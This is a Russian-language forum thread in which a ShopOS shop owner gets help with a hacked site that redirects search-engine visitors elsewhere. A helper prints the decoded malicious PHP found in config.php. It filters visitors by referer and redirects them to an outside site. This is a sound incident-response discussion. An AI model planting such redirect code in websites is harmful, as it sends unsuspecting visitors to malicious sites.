Категории

[FAQ] Часто задаваемые вопросы и ответы

Проблемы и решения

Ошибки и исправления

Общие вопросы

Расширения

Установка и обновление

Модули

Шаблоны

Локализация интерфейса

Коммерческие предложения

Учимся бизнесу

Бизнес книги

Поисковая оптимизация (SEO)

Магазины на ShopOS

Хостинг для ShopOS

Предложения и пожелания

Курилка

Нужна помощь, плиз!!!! Срочно!!!

Захожу по прямой ссылке http://consul-avto.ru/, сайт грузится отлично, но через поисковики GOOGLE, YANDEX и т.д. при переходе по ссылке вылетают совершенно иные сайты пример  http://monkeyball.osa.pl/?said=3333&q=. В чем может быть проблема???(((((

у вас там вирусня какая-то. при заходе с ПС редиректит на левые сайты
проверьте файл .htaccess на наличие левого кода или скиньте его сюда.
возможно и в php где-то, что-то прописали. нужно проверять файлы.

Вот файл из корневого каталога, где еще можно посмотреть. вроде в данном файле левого ничего не  нашел(((

значит заражены php файлы.
могу глянуть, если доступы предоставите

Вам доступы на FTP???

да. на почту в подписи.

Выслал на почту, помогите плиз!!!

В config.php в base64 была закодированная строка.
вот содержимое

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://costabrava.bee.pl/");
exit();
}
}
}
}


Суть такова, что всех кто пришел с ПС или с соц. сетей перекидывает на зловредный сайт.
вроде больше ничего не нашел.
смените все пароли на FTP!

Странное дело.
Видимо сначала этот код сунули в index.php. так как после открывающегося <?php есть такое же количество пробелов как и в  config.php после которых шел зловредный код.
и 28 числа(вчера) кто-то изменил видать и перенес в конфиг. или просто удалил из index.php. не знаю. но похоже что пытались сунуть и в index.php...

Вы кому доступ еще давали?

Спасибо огромное!!! В Index я сам удалил, в первой строке был прописан вирусняга, а вот в config даже не подумал залезть!!

А. понятно.
Я просто искал файлы с измененной датой. а там как раз index.php и config.php попались.

Источник
Copyright ShopOS